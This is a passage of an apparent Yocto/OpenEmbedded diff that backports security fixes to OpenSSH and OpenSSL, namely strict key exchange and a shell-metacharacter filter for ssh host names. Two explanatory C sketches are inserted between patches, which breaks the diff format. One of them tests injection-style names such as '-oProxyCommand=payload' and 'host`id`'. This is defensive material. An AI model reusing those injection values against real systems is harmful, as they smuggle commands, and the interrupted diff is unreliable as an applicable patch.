+ if ((r = kex_send_kexinit(ssh)) != 0)
+ return r;
+- if ((r = kex_choose_conf(ssh)) != 0)
++ if ((r = kex_choose_conf(ssh, seq)) != 0)
+ return r;
+
+ if (kex->kex_type < KEX_MAX && kex->kex[kex->kex_type] != NULL)
+@@ -880,7 +900,13 @@ proposals_match(char *my[PROPOSAL_MAX], char *peer[PROPOSAL_MAX])
+ }
+
+ static int
+-kex_choose_conf(struct ssh *ssh)
++kexalgs_contains(char **peer, const char *ext)
++{
++ return has_any_alg(peer[PROPOSAL_KEX_ALGS], ext);
++}
++
++static int
++kex_choose_conf(struct ssh *ssh, uint32_t seq)
+ {
+ struct kex *kex = ssh->kex;
+ struct newkeys *newkeys;
+@@ -905,13 +931,23 @@ kex_choose_conf(struct ssh *ssh)
+ sprop=peer;
+ }
+
+- /* Check whether client supports ext_info_c */
+- if (kex->server && (kex->flags & KEX_INITIAL)) {
+- char *ext;
+-
+- ext = match_list("ext-info-c", peer[PROPOSAL_KEX_ALGS], NULL);
+- kex->ext_info_c = (ext != NULL);
+- free(ext);
++ /* Check whether peer supports ext_info/kex_strict */
++ if ((kex->flags & KEX_INITIAL) != 0) {
++ if (kex->server) {
++ kex->ext_info_c = kexalgs_contains(peer, "ext-info-c");
++ kex->kex_strict = kexalgs_contains(peer,
++ "kex-strict-c-v00@openssh.com");
++ } else {
++ kex->kex_strict = kexalgs_contains(peer,
++ "kex-strict-s-v00@openssh.com");
++ }
++ if (kex->kex_strict) {
++ debug3("will use strict KEX ordering");
++ if (seq != 0)
++ ssh_packet_disconnect(ssh,
++ "strict KEX violation: "
++ "KEXINIT was not the first packet");
++ }
+ }
+
+ /* Algorithm Negotiation */
+diff --git a/kex.h b/kex.h
+index a5ae6ac..cae38f7 100644
+--- a/kex.h
++++ b/kex.h
+@@ -145,6 +145,7 @@ struct kex {
+ u_int kex_type;
+ char *server_sig_algs;
+ int ext_info_c;
++ int kex_strict;
+ struct sshbuf *my;
+ struct sshbuf *peer;
+ struct sshbuf *client_version;
+diff --git a/packet.c b/packet.c
+index 6d3e917..43139f9 100644
+--- a/packet.c
++++ b/packet.c
+@@ -1203,8 +1203,13 @@ ssh_packet_send2_wrapped(struct ssh *ssh)
+ sshbuf_dump(state->output, stderr);
+ #endif
+ /* increment sequence number for outgoing packets */
+- if (++state->p_send.seqnr == 0)
++ if (++state->p_send.seqnr == 0) {
++ if ((ssh->kex->flags & KEX_INITIAL) != 0) {
++ ssh_packet_disconnect(ssh, "outgoing sequence number "
++ "wrapped during initial key exchange");
++ }
+ logit("outgoing seqnr wraps around");
++ }
+ if (++state->p_send.packets == 0)
+ if (!(ssh->compat & SSH_BUG_NOREKEY))
+ return SSH_ERR_NEED_REKEY;
+@@ -1212,6 +1217,11 @@ ssh_packet_send2_wrapped(struct ssh *ssh)
+ state->p_send.bytes += len;
+ sshbuf_reset(state->outgoing_packet);
+
++ if (type == SSH2_MSG_NEWKEYS && ssh->kex->kex_strict) {
++ debug("resetting send seqnr %u", state->p_send.seqnr);
++ state->p_send.seqnr = 0;
++ }
++
+ if (type == SSH2_MSG_NEWKEYS)
+ r = ssh_set_newkeys(ssh, MODE_OUT);
+ else if (type == SSH2_MSG_USERAUTH_SUCCESS && state->server_side)
+@@ -1345,8 +1355,7 @@ ssh_packet_read_seqnr(struct ssh *ssh, u_char *typep, u_int32_t *seqnr_p)
+ /* Stay in the loop until we have received a complete packet. */
+ for (;;) {
+ /* Try to read a packet from the buffer. */
+- r = ssh_packet_read_poll_seqnr(ssh, typep, seqnr_p);
+- if (r != 0)
++ if ((r = ssh_packet_read_poll_seqnr(ssh, typep, seqnr_p)) != 0)
+ break;
+ /* If we got a packet, return it. */
+ if (*typep != SSH_MSG_NONE)
+@@ -1633,10 +1642,16 @@ ssh_packet_read_poll2(struct ssh *ssh, u_char *typep, u_int32_t *seqnr_p)
+ if ((r = sshbuf_consume(state->input, mac->mac_len)) != 0)
+ goto out;
+ }
++
+ if (seqnr_p != NULL)
+ *seqnr_p = state->p_read.seqnr;
+- if (++state->p_read.seqnr == 0)
++ if (++state->p_read.seqnr == 0) {
++ if ((ssh->kex->flags & KEX_INITIAL) != 0) {
++ ssh_packet_disconnect(ssh, "incoming sequence number "
++ "wrapped during initial key exchange");
++ }
+ logit("incoming seqnr wraps around");
++ }
+ if (++state->p_read.packets == 0)
+ if (!(ssh->compat & SSH_BUG_NOREKEY))
+ return SSH_ERR_NEED_REKEY;
+@@ -1702,6 +1717,10 @@ ssh_packet_read_poll2(struct ssh *ssh, u_char *typep, u_int32_t *seqnr_p)
+ #endif
+ /* reset for next packet */
+ state->packlen = 0;
++ if (*typep == SSH2_MSG_NEWKEYS && ssh->kex->kex_strict) {
++ debug("resetting read seqnr %u", state->p_read.seqnr);
++ state->p_read.seqnr = 0;
++ }
+
+ /* do we need to rekey? */
+ if (ssh_packet_need_rekeying(ssh, 0)) {
+@@ -1726,10 +1745,39 @@ ssh_packet_read_poll_seqnr(struct ssh *ssh, u_char *typep, u_int32_t *seqnr_p)
+ r = ssh_packet_read_poll2(ssh, typep, seqnr_p);
+ if (r != 0)
+ return r;
+- if (*typep) {
+- state->keep_alive_timeouts = 0;
+- DBG(debug("received packet type %d", *typep));
++ if (*typep == 0) {
++ /* no message ready */
++ return 0;
++ }
++ state->keep_alive_timeouts = 0;
++ DBG(debug("received packet type %d", *typep));
++
++ /* Always process disconnect messages */
++ if (*typep == SSH2_MSG_DISCONNECT) {
++ if ((r = sshpkt_get_u32(ssh, &reason)) != 0 ||
++ (r = sshpkt_get_string(ssh, &msg, NULL)) != 0)
++ return r;
++ /* Ignore normal client exit notifications */
++ do_log2(ssh->state->server_side &&
++ reason == SSH2_DISCONNECT_BY_APPLICATION ?
++ SYSLOG_LEVEL_INFO : SYSLOG_LEVEL_ERROR,
++ "Received disconnect from %s port %d:"
++ "%u: %.400s", ssh_remote_ipaddr(ssh),
++ ssh_remote_port(ssh), reason, msg);
++ free(msg);
++ return SSH_ERR_DISCONNECTED;
+ }
++
++ /*
++ * Do not implicitly handle any messages here during initial
++ * KEX when in strict mode. They will be need to be allowed
++ * explicitly by the KEX dispatch table or they will generate
++ * protocol errors.
++ */
++ if (ssh->kex != NULL &&
++ (ssh->kex->flags & KEX_INITIAL) && ssh->kex->kex_strict)
++ return 0;
++ /* Implicitly handle transport-level messages */
+ switch (*typep) {
+ case SSH2_MSG_IGNORE:
+ debug3("Received SSH2_MSG_IGNORE");
+@@ -1744,19 +1792,6 @@ ssh_packet_read_poll_seqnr(struct ssh *ssh, u_char *typep, u_int32_t *seqnr_p)
+ debug("Remote: %.900s", msg);
+ free(msg);
+ break;
+- case SSH2_MSG_DISCONNECT:
+- if ((r = sshpkt_get_u32(ssh, &reason)) != 0 ||
+- (r = sshpkt_get_string(ssh, &msg, NULL)) != 0)
+- return r;
+- /* Ignore normal client exit notifications */
+- do_log2(ssh->state->server_side &&
+- reason == SSH2_DISCONNECT_BY_APPLICATION ?
+- SYSLOG_LEVEL_INFO : SYSLOG_LEVEL_ERROR,
+- "Received disconnect from %s port %d:"
+- "%u: %.400s", ssh_remote_ipaddr(ssh),
+- ssh_remote_port(ssh), reason, msg);
+- free(msg);
+- return SSH_ERR_DISCONNECTED;
+ case SSH2_MSG_UNIMPLEMENTED:
+ if ((r = sshpkt_get_u32(ssh, &seqnr)) != 0)
+ return r;
+@@ -2235,6 +2270,7 @@ kex_to_blob(struct sshbuf *m, struct kex *kex)
+ (r = sshbuf_put_u32(m, kex->hostkey_type)) != 0 ||
+ (r = sshbuf_put_u32(m, kex->hostkey_nid)) != 0 ||
+ (r = sshbuf_put_u32(m, kex->kex_type)) != 0 ||
++ (r = sshbuf_put_u32(m, kex->kex_strict)) != 0 ||
+ (r = sshbuf_put_stringb(m, kex->my)) != 0 ||
+ (r = sshbuf_put_stringb(m, kex->peer)) != 0 ||
+ (r = sshbuf_put_stringb(m, kex->client_version)) != 0 ||
+@@ -2397,6 +2433,7 @@ kex_from_blob(struct sshbuf *m, struct kex **kexp)
+ (r = sshbuf_get_u32(m, (u_int *)&kex->hostkey_type)) != 0 ||
+ (r = sshbuf_get_u32(m, (u_int *)&kex->hostkey_nid)) != 0 ||
+ (r = sshbuf_get_u32(m, &kex->kex_type)) != 0 ||
++ (r = sshbuf_get_u32(m, &kex->kex_strict)) != 0 ||
+ (r = sshbuf_get_stringb(m, kex->my)) != 0 ||
+ (r = sshbuf_get_stringb(m, kex->peer)) != 0 ||
+ (r = sshbuf_get_stringb(m, kex->client_version)) != 0 ||
+@@ -2724,6 +2761,7 @@ sshpkt_disconnect(struct ssh *ssh, const char *fmt,...)
+ vsnprintf(buf, sizeof(buf), fmt, args);
+ va_end(args);
+
++ debug2("sending SSH2_MSG_DISCONNECT: %s", buf);
+ if ((r = sshpkt_start(ssh, SSH2_MSG_DISCONNECT)) != 0 ||
+ (r = sshpkt_put_u32(ssh, SSH2_DISCONNECT_PROTOCOL_ERROR)) != 0 ||
+ (r = sshpkt_put_cstring(ssh, buf)) != 0 ||
+diff --git a/sshconnect2.c b/sshconnect2.c
+index 5df9477..617ed9f 100644
+--- a/sshconnect2.c
++++ b/sshconnect2.c
+@@ -218,7 +218,8 @@ ssh_kex2(struct ssh *ssh, char *host, struct sockaddr *hostaddr, u_short port)
+ fatal("%s: kex_assemble_namelist", __func__);
+ free(all_key);
+
+- if ((s = kex_names_cat(options.kex_algorithms, "ext-info-c")) == NULL)
++ if ((s = kex_names_cat(options.kex_algorithms,
++ "ext-info-c,kex-strict-c-v00@openssh.com")) == NULL)
+ fatal("%s: kex_names_cat", __func__);
+ myproposal[PROPOSAL_KEX_ALGS] = compat_kex_proposal(s);
+ myproposal[PROPOSAL_ENC_ALGS_CTOS] =
+@@ -343,7 +344,6 @@ struct cauthmethod {
+ };
+
+ static int input_userauth_service_accept(int, u_int32_t, struct ssh *);
+-static int input_userauth_ext_info(int, u_int32_t, struct ssh *);
+ static int input_userauth_success(int, u_int32_t, struct ssh *);
+ static int input_userauth_failure(int, u_int32_t, struct ssh *);
+ static int input_userauth_banner(int, u_int32_t, struct ssh *);
+@@ -460,7 +460,7 @@ ssh_userauth2(struct ssh *ssh, const char *local_user,
+
+ ssh->authctxt = &authctxt;
+ ssh_dispatch_init(ssh, &input_userauth_error);
+- ssh_dispatch_set(ssh, SSH2_MSG_EXT_INFO, &input_userauth_ext_info);
++ ssh_dispatch_set(ssh, SSH2_MSG_EXT_INFO, kex_input_ext_info);
+ ssh_dispatch_set(ssh, SSH2_MSG_SERVICE_ACCEPT, &input_userauth_service_accept);
+ ssh_dispatch_run_fatal(ssh, DISPATCH_BLOCK, &authctxt.success); /* loop until success */
+ pubkey_cleanup(ssh);
+@@ -505,13 +505,6 @@ input_userauth_service_accept(int type, u_int32_t seq, struct ssh *ssh)
+ return r;
+ }
+
+-/* ARGSUSED */
+-static int
+-input_userauth_ext_info(int type, u_int32_t seqnr, struct ssh *ssh)
+-{
+- return kex_input_ext_info(type, seqnr, ssh);
+-}
+-
+ void
+ userauth(struct ssh *ssh, char *authlist)
+ {
+@@ -593,6 +586,7 @@ input_userauth_success(int type, u_int32_t seq, struct ssh *ssh)
+ free(authctxt->methoddata);
+ authctxt->methoddata = NULL;
+ authctxt->success = 1; /* break out */
++ ssh_dispatch_set(ssh, SSH2_MSG_EXT_INFO, dispatch_protocol_error);
+ return 0;
+ }
+
+diff --git a/sshd.c b/sshd.c
+index 60b2aaf..ffea38c 100644
+--- a/sshd.c
++++ b/sshd.c
+@@ -2323,11 +2323,13 @@ static void
+ do_ssh2_kex(struct ssh *ssh)
+ {
+ char *myproposal[PROPOSAL_MAX] = { KEX_SERVER };
++ char *s;
+ struct kex *kex;
+ int r;
+
+- myproposal[PROPOSAL_KEX_ALGS] = compat_kex_proposal(
+- options.kex_algorithms);
++ if ((s = kex_names_cat(options.kex_algorithms, "kex-strict-s-v00@openssh.com")) == NULL)
++ fatal("kex_names_cat");
++ myproposal[PROPOSAL_KEX_ALGS] = compat_kex_proposal(s);
+ myproposal[PROPOSAL_ENC_ALGS_CTOS] = compat_cipher_proposal(
+ options.ciphers);
+ myproposal[PROPOSAL_ENC_ALGS_STOC] = compat_cipher_proposal(
+@@ -2382,6 +2384,7 @@ do_ssh2_kex(struct ssh *ssh)
+ packet_send();
+ packet_write_wait();
+ #endif
++ free(s);
+ debug("KEX done");
+ }
+
+--
+2.25.1
+
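The two strict-KEX behaviours described in the PROTOCOL text above can be summarised with a small sketch; struct packet_state and the message constants below are simplified stand-ins for illustration, not OpenSSH's internal types:

    #include <stdint.h>
    #include <stdio.h>
    #include <stdlib.h>

    #define MSG_KEXINIT 20
    #define MSG_NEWKEYS 21

    struct packet_state {
        uint32_t seqnr;
        int kex_strict;       /* peer advertised kex-strict-*-v00@openssh.com */
        int in_initial_kex;
    };

    /* (a) During the initial KEX in strict mode, any unexpected packet is fatal. */
    static void on_unexpected_packet(struct packet_state *st, int type)
    {
        if (st->in_initial_kex && st->kex_strict) {
            fprintf(stderr, "strict KEX violation: packet type %d\n", type);
            exit(1);
        }
    }

    /* (b) After sending or receiving NEWKEYS, the sequence number resets to zero. */
    static void after_packet(struct packet_state *st, int type)
    {
        st->seqnr++;
        if (type == MSG_NEWKEYS && st->kex_strict)
            st->seqnr = 0;
    }

    int main(void)
    {
        struct packet_state st = { .seqnr = 3, .kex_strict = 1, .in_initial_kex = 1 };
        after_packet(&st, MSG_NEWKEYS);
        printf("seqnr after NEWKEYS: %u\n", (unsigned)st.seqnr);   /* 0 */
        on_unexpected_packet(&st, 2 /* e.g. SSH2_MSG_IGNORE */);   /* terminates */
        return 0;
    }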
diff --git a/meta/recipes-connectivity/openssh/openssh/CVE-2023-51385.patch b/meta/recipes-connectivity/openssh/openssh/CVE-2023-51385.patch
new file mode 100644
index 0000000000..0ba8c312d0
--- /dev/null
+++ b/meta/recipes-connectivity/openssh/openssh/CVE-2023-51385.patch
@@ -0,0 +1,95 @@
+From 7ef3787c84b6b524501211b11a26c742f829af1a Mon Sep 17 00:00:00 2001
+From: "djm@openbsd.org" <djm@openbsd.org>
+Date: Mon, 18 Dec 2023 14:47:44 +0000
+Subject: [PATCH] upstream: ban user/hostnames with most shell metacharacters
+
+This makes ssh(1) refuse user or host names provided on the
+commandline that contain most shell metacharacters.
+
+Some programs that invoke ssh(1) using untrusted data do not filter
+metacharacters in arguments they supply. This could create
+interactions with user-specified ProxyCommand and other directives
+that allow shell injection attacks to occur.
+
+It's a mistake to invoke ssh(1) with arbitrary untrusted arguments,
+but getting this stuff right can be tricky, so this should prevent
+most obvious ways of creating risky situations. It however is not
+and cannot be perfect: ssh(1) has no practical way of interpreting
+what shell quoting rules are in use and how they interact with the
+user's specified ProxyCommand.
+
+To allow configurations that use strange user or hostnames to
+continue to work, this strictness is applied only to names coming
+from the commandline. Names specified using User or Hostname
+directives in ssh_config(5) are not affected.
+
+feedback/ok millert@ markus@ dtucker@ deraadt@
+
+OpenBSD-Commit-ID: 3b487348b5964f3e77b6b4d3da4c3b439e94b2d9
+
+CVE: CVE-2023-51385
+Upstream-Status: Backport [https://github.com/openssh/openssh-portable/commit/7ef3787c84b6b524501211b11a26c742f829af1a]
+Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
+Comment: Hunks refreshed to apply cleanly
+
+---
+ ssh.c | 41 ++++++++++++++++++++++++++++++++++++++++-
+ 1 file changed, 40 insertions(+), 1 deletion(-)
+
+diff --git a/ssh.c b/ssh.c
+index 35c48e62d18..48d93ddf2a9 100644
+--- a/ssh.c
++++ b/ssh.c
+@@ -583,6 +583,41 @@ set_addrinfo_port(struct addrinfo *addrs
+ }
+ }
+
++static int
++valid_hostname(const char *s)
++{
++ size_t i;
++
++ if (*s == '-')
++ return 0;
++ for (i = 0; s[i] != 0; i++) {
++ if (strchr("'`\"$\\;&<>|(){}", s[i]) != NULL ||
++ isspace((u_char)s[i]) || iscntrl((u_char)s[i]))
++ return 0;
++ }
++ return 1;
++}
++
++static int
++valid_ruser(const char *s)
++{
++ size_t i;
++
++ if (*s == '-')
++ return 0;
++ for (i = 0; s[i] != 0; i++) {
++ if (strchr("'`\";&<>|(){}", s[i]) != NULL)
++ return 0;
++ /* Disallow '-' after whitespace */
++ if (isspace((u_char)s[i]) && s[i + 1] == '-')
++ return 0;
++ /* Disallow \ in last position */
++ if (s[i] == '\\' && s[i + 1] == '\0')
++ return 0;
++ }
++ return 1;
++}
++
+ /*
+ * Main program for the ssh client.
+ */
+@@ -1069,6 +1104,10 @@ main(int ac, char **av)
+ if (!host)
+ usage();
+
++ if (!valid_hostname(host))
++ fatal("hostname contains invalid characters");
++ if (options.user != NULL && !valid_ruser(options.user))
++ fatal("remote username contains invalid characters");
+ host_arg = xstrdup(host);
+
+ /* Initialize the command to execute on remote host. */
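A standalone sketch of the style of check introduced above, handy for seeing which command-line host names would now be rejected; hostname_ok is a re-implementation for illustration, not the exact function from ssh.c:

    #include <ctype.h>
    #include <stdio.h>
    #include <string.h>

    /* Reject names starting with '-' or containing shell metacharacters,
     * whitespace or control characters, mirroring the policy described above. */
    static int hostname_ok(const char *s)
    {
        if (*s == '-')
            return 0;
        for (size_t i = 0; s[i] != '\0'; i++) {
            if (strchr("'`\"$\\;&<>|(){}", s[i]) != NULL ||
                isspace((unsigned char)s[i]) || iscntrl((unsigned char)s[i]))
                return 0;
        }
        return 1;
    }

    int main(void)
    {
        const char *names[] = { "example.com", "-oProxyCommand=payload", "host`id`" };
        for (int i = 0; i < 3; i++)
            printf("%-28s %s\n", names[i],
                   hostname_ok(names[i]) ? "accepted" : "rejected");
        return 0;
    }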
diff --git a/meta/recipes-connectivity/openssh/openssh/sshd.socket b/meta/recipes-connectivity/openssh/openssh/sshd.socket
index 12c39b26b5..8d76d62309 100644
--- a/meta/recipes-connectivity/openssh/openssh/sshd.socket
+++ b/meta/recipes-connectivity/openssh/openssh/sshd.socket
@@ -1,5 +1,6 @@
[Unit]
Conflicts=sshd.service
+Wants=sshdgenkeys.service
[Socket]
ExecStartPre=@BASE_BINDIR@/mkdir -p /var/run/sshd
diff --git a/meta/recipes-connectivity/openssh/openssh/sshd@.service b/meta/recipes-connectivity/openssh/openssh/sshd@.service
index 9d83dfb2bb..422450c7a1 100644
--- a/meta/recipes-connectivity/openssh/openssh/sshd@.service
+++ b/meta/recipes-connectivity/openssh/openssh/sshd@.service
@@ -1,13 +1,11 @@
[Unit]
Description=OpenSSH Per-Connection Daemon
-Wants=sshdgenkeys.service
After=sshdgenkeys.service
[Service]
Environment="SSHD_OPTS="
EnvironmentFile=-/etc/default/ssh
ExecStart=-@SBINDIR@/sshd -i $SSHD_OPTS
-ExecReload=@BASE_BINDIR@/kill -HUP $MAINPID
StandardInput=socket
StandardError=syslog
KillMode=process
diff --git a/meta/recipes-connectivity/openssh/openssh_8.2p1.bb b/meta/recipes-connectivity/openssh/openssh_8.2p1.bb
index fe94f30503..9d6cf7da6c 100644
--- a/meta/recipes-connectivity/openssh/openssh_8.2p1.bb
+++ b/meta/recipes-connectivity/openssh/openssh_8.2p1.bb
@@ -5,7 +5,7 @@ Ssh (Secure Shell) is a program for logging into a remote machine \
and for executing commands on a remote machine."
HOMEPAGE = "http://www.openssh.com/"
SECTION = "console/network"
-LICENSE = "BSD & ISC & MIT"
+LICENSE = "BSD-2-Clause & BSD-3-Clause & BSD-4-Clause & ISC & MIT"
LIC_FILES_CHKSUM = "file://LICENCE;md5=18d9e5a8b3dd1790d73502f50426d4d3"
DEPENDS = "zlib openssl virtual/crypt"
@@ -24,14 +24,63 @@ SRC_URI = "http://ftp.openbsd.org/pub/OpenBSD/OpenSSH/portable/openssh-${PV}.tar
file://fix-potential-signed-overflow-in-pointer-arithmatic.patch \
file://sshd_check_keys \
file://add-test-support-for-busybox.patch \
+ file://CVE-2020-14145.patch \
+ file://CVE-2021-28041.patch \
+ file://CVE-2021-41617.patch \
+ file://CVE-2023-38408-01.patch \
+ file://CVE-2023-38408-02.patch \
+ file://CVE-2023-38408-03.patch \
+ file://CVE-2023-38408-04.patch \
+ file://CVE-2023-38408-05.patch \
+ file://CVE-2023-38408-06.patch \
+ file://CVE-2023-38408-07.patch \
+ file://CVE-2023-38408-08.patch \
+ file://CVE-2023-38408-09.patch \
+ file://CVE-2023-38408-10.patch \
+ file://CVE-2023-38408-11.patch \
+ file://CVE-2023-38408-12.patch \
+ file://CVE-2023-48795.patch \
+ file://CVE-2023-51385.patch \
"
SRC_URI[md5sum] = "3076e6413e8dbe56d33848c1054ac091"
SRC_URI[sha256sum] = "43925151e6cf6cee1450190c0e9af4dc36b41c12737619edff8bcebdff64e671"
+# This CVE is specific to OpenSSH with the pam opie module, which we don't build/use here
+CVE_CHECK_WHITELIST += "CVE-2007-2768"
+
# This CVE is specific to OpenSSH server, as used in Fedora and Red Hat Enterprise Linux 7
# and when running in a Kerberos environment. As such it is not relevant to OpenEmbedded
CVE_CHECK_WHITELIST += "CVE-2014-9278"
+# As per upstream, scp is based on a historical protocol called rcp which relies on
+# that style of argument passing and therefore encounters expansion problems.
+# Making changes to how the scp command line works breaks the pattern used
+# by scp consumers. Upstream therefore recommends the use of rsync in place of
+# scp for better security. https://bugzilla.redhat.com/show_bug.cgi?id=1860487
+CVE_CHECK_WHITELIST += "CVE-2020-15778"
+
+# CVE-2008-3844 was reported in OpenSSH on Red Hat Enterprise Linux and
+# certain packages may have been compromised. This CVE is not applicable
+# as our source is OpenBSD. https://securitytracker.com/id?1020730
+# https://www.securityfocus.com/bid/30794
+CVE_CHECK_WHITELIST += "CVE-2008-3844"
+
+# openssh-ssh1 is provided for compatibility with old devices that
+# cannot be upgraded to modern protocols. Thus they may not provide security
+# support for this package because doing so would prevent access to equipment.
+# The upstream OpenSSH developers see this as an important
+# security feature and do not intend to 'fix' it.
+# https://security-tracker.debian.org/tracker/CVE-2016-20012
+# https://ubuntu.com/security/CVE-2016-20012
+CVE_CHECK_WHITELIST += "CVE-2016-20012"
+
+# As per Debian, the issue is fixed by a feature called "agent restriction" in openssh 8.9.
+# Urgency is unimportant as per Debian, hence this CVE is whitelisted.
+# https://security-tracker.debian.org/tracker/CVE-2021-36368
+# https://bugzilla.mindrot.org/show_bug.cgi?id=3316#c2
+# https://docs.ssh-mitm.at/trivialauth.html
+CVE_CHECK_WHITELIST += "CVE-2021-36368"
+
PAM_SRC_URI = "file://sshd"
inherit manpages useradd update-rc.d update-alternatives systemd
@@ -155,12 +204,17 @@ FILES_${PN}-sftp-server = "${libexecdir}/sftp-server"
FILES_${PN}-misc = "${bindir}/ssh* ${libexecdir}/ssh*"
FILES_${PN}-keygen = "${bindir}/ssh-keygen"
-RDEPENDS_${PN} += "${PN}-scp ${PN}-ssh ${PN}-sshd ${PN}-keygen"
+RDEPENDS_${PN} += "${PN}-scp ${PN}-ssh ${PN}-sshd ${PN}-keygen ${PN}-sftp-server"
RDEPENDS_${PN}-sshd += "${PN}-keygen ${@bb.utils.contains('DISTRO_FEATURES', 'pam', 'pam-plugin-keyinit pam-plugin-loginuid', '', d)}"
RRECOMMENDS_${PN}-sshd_append_class-target = "\
${@bb.utils.filter('PACKAGECONFIG', 'rng-tools', d)} \
"
+# break dependency on base package for -dev package
+# otherwise SDK fails to build as the main openssh and dropbear packages
+# conflict with each other
+RDEPENDS_${PN}-dev = ""
+
# gdb would make attach-ptrace test pass rather than skip but not worth the build dependencies
RDEPENDS_${PN}-ptest += "${PN}-sftp ${PN}-misc ${PN}-sftp-server make sed sudo coreutils"
diff --git a/meta/recipes-connectivity/openssl/openssl/0001-Configure-add-2-missing-key-sorts.patch b/meta/recipes-connectivity/openssl/openssl/0001-Configure-add-2-missing-key-sorts.patch
new file mode 100644
index 0000000000..e2a65d0998
--- /dev/null
+++ b/meta/recipes-connectivity/openssl/openssl/0001-Configure-add-2-missing-key-sorts.patch
@@ -0,0 +1,38 @@
+From 679ae2f72ef8cf37609cb0eff5de3b98aa85e395 Mon Sep 17 00:00:00 2001
+From: Steve Sakoman <steve@sakoman.com>
+Date: Thu, 20 Jul 2023 04:14:42 -1000
+Subject: [PATCH] Configure: add 2 missing key sorts in generation of unified_info
+
+Otherwise generation of this section in configdata.pm is not reproducible
+
+Signed-off-by: Steve Sakoman <steve@sakoman.com>
+Upstream-Status: Backport [adapted from 3.x commit https://github.com/openssl/openssl/commit/764cf5b26306a8712e8b3d41599c44dc5ed07a25]
+---
+ Configure | 4 ++--
+ 1 file changed, 2 insertions(+), 2 deletions(-)
+
+diff --git a/Configure b/Configure
+index 2a01746..8fc5a2c 100755
+--- a/Configure
++++ b/Configure
+@@ -2326,7 +2326,7 @@ EOF
+ "dso" => [ @{$unified_info{engines}} ],
+ "bin" => [ @{$unified_info{programs}} ],
+ "script" => [ @{$unified_info{scripts}} ] );
+- foreach my $type (keys %loopinfo) {
++ foreach my $type (sort keys %loopinfo) {
+ foreach my $product (@{$loopinfo{$type}}) {
+ my %dirs = ();
+ my $pd = dirname($product);
+@@ -2347,7 +2347,7 @@ EOF
+ push @{$unified_info{dirinfo}->{$d}->{deps}}, $_
+ if $d ne $pd;
+ }
+- foreach (keys %dirs) {
++ foreach (sort keys %dirs) {
+ push @{$unified_info{dirinfo}->{$_}->{products}->{$type}},
+ $product;
+ }
+--
+2.34.1
+
diff --git a/meta/recipes-connectivity/openssl/openssl/0001-Configure-do-not-tweak-mips-cflags.patch b/meta/recipes-connectivity/openssl/openssl/0001-Configure-do-not-tweak-mips-cflags.patch
new file mode 100644
index 0000000000..b3f6a942d5
--- /dev/null
+++ b/meta/recipes-connectivity/openssl/openssl/0001-Configure-do-not-tweak-mips-cflags.patch
@@ -0,0 +1,37 @@
+From 326909baf81a638d51fa8be1d8227518784f5cc4 Mon Sep 17 00:00:00 2001
+From: Alexander Kanavin <alex@linutronix.de>
+Date: Tue, 14 Sep 2021 12:18:25 +0200
+Subject: [PATCH] Configure: do not tweak mips cflags
+
+This conflicts with mips machine definitons from yocto,
+e.g.
+| Error: -mips3 conflicts with the other architecture options, which imply -mips64r2
+
+Upstream-Status: Inappropriate [oe-core specific]
+Signed-off-by: Alexander Kanavin <alex@linutronix.de>
+Signed-off-by: Peter Marko <peter.marko@siemens.com>
+---
+ Configure | 10 ----------
+ 1 file changed, 10 deletions(-)
+
+Index: openssl-3.0.4/Configure
+===================================================================
+--- openssl-3.0.4.orig/Configure
++++ openssl-3.0.4/Configure
+@@ -1243,16 +1243,6 @@ if ($target =~ /^mingw/ && `$config{CC} --target-help 2>&1` =~ m/-mno-cygwin/m)
+ push @{$config{shared_ldflag}}, "-mno-cygwin";
+ }
+
+-if ($target =~ /linux.*-mips/ && !$disabled{asm}
+- && !grep { $_ =~ /-m(ips|arch=)/ } (@{$config{CFLAGS}})) {
+- # minimally required architecture flags for assembly modules
+- my $value;
+- $value = '-mips2' if ($target =~ /mips32/);
+- $value = '-mips3' if ($target =~ /mips64/);
+- unshift @{$config{cflags}}, $value;
+- unshift @{$config{cxxflags}}, $value if $config{CXX};
+-}
+-
+ # If threads aren't disabled, check how possible they are
+ unless ($disabled{threads}) {
+ if ($auto_threads) {
diff --git a/meta/recipes-connectivity/openssl/openssl/CVE-2024-0727.patch b/meta/recipes-connectivity/openssl/openssl/CVE-2024-0727.patch
new file mode 100644
index 0000000000..3da6879ccb
--- /dev/null
+++ b/meta/recipes-connectivity/openssl/openssl/CVE-2024-0727.patch
@@ -0,0 +1,122 @@
+Backport of:
+
+From 09df4395b5071217b76dc7d3d2e630eb8c5a79c2 Mon Sep 17 00:00:00 2001
+From: Matt Caswell <matt@openssl.org>
+Date: Fri, 19 Jan 2024 11:28:58 +0000
+Subject: [PATCH] Add NULL checks where ContentInfo data can be NULL
+
+PKCS12 structures contain PKCS7 ContentInfo fields. These fields are
+optional and can be NULL even if the "type" is a valid value. OpenSSL
+was not properly accounting for this and a NULL dereference can occur
+causing a crash.
+
+CVE-2024-0727
+
+Reviewed-by: Tomas Mraz <tomas@openssl.org>
+Reviewed-by: Hugo Landau <hlandau@openssl.org>
+Reviewed-by: Neil Horman <nhorman@openssl.org>
+(Merged from https://github.com/openssl/openssl/pull/23362)
+
+(cherry picked from commit d135eeab8a5dbf72b3da5240bab9ddb7678dbd2c)
+
+Upstream-Status: Backport [https://github.com/openssl/openssl/commit/d135eeab8a5dbf72b3da5240bab9ddb7678dbd2c]
+
+CVE: CVE-2024-0727
+
+Signed-off-by: virendra thakur <virendrak@kpit.com>
+---
+ crypto/pkcs12/p12_add.c | 18 ++++++++++++++++++
+ crypto/pkcs12/p12_mutl.c | 5 +++++
+ crypto/pkcs12/p12_npas.c | 5 +++--
+ crypto/pkcs7/pk7_mime.c | 7 +++++--
+ 4 files changed, 31 insertions(+), 4 deletions(-)
+
+--- a/crypto/pkcs12/p12_add.c
++++ b/crypto/pkcs12/p12_add.c
+@@ -76,6 +76,13 @@ STACK_OF(PKCS12_SAFEBAG) *PKCS12_unpack_
+ PKCS12_R_CONTENT_TYPE_NOT_DATA);
+ return NULL;
+ }
++
++ if (p7->d.data == NULL) {
++ PKCS12err(PKCS12_F_PKCS12_UNPACK_P7DATA,
++ PKCS12_R_DECODE_ERROR);
++ return NULL;
++ }
++
+ return ASN1_item_unpack(p7->d.data, ASN1_ITEM_rptr(PKCS12_SAFEBAGS));
+ }
+
+@@ -132,6 +139,12 @@ STACK_OF(PKCS12_SAFEBAG) *PKCS12_unpack_
+ {
+ if (!PKCS7_type_is_encrypted(p7))
+ return NULL;
++
++ if (p7->d.encrypted == NULL) {
++ PKCS12err(PKCS12_F_PKCS12_UNPACK_P7DATA, PKCS12_R_DECODE_ERROR);
++ return NULL;
++ }
++
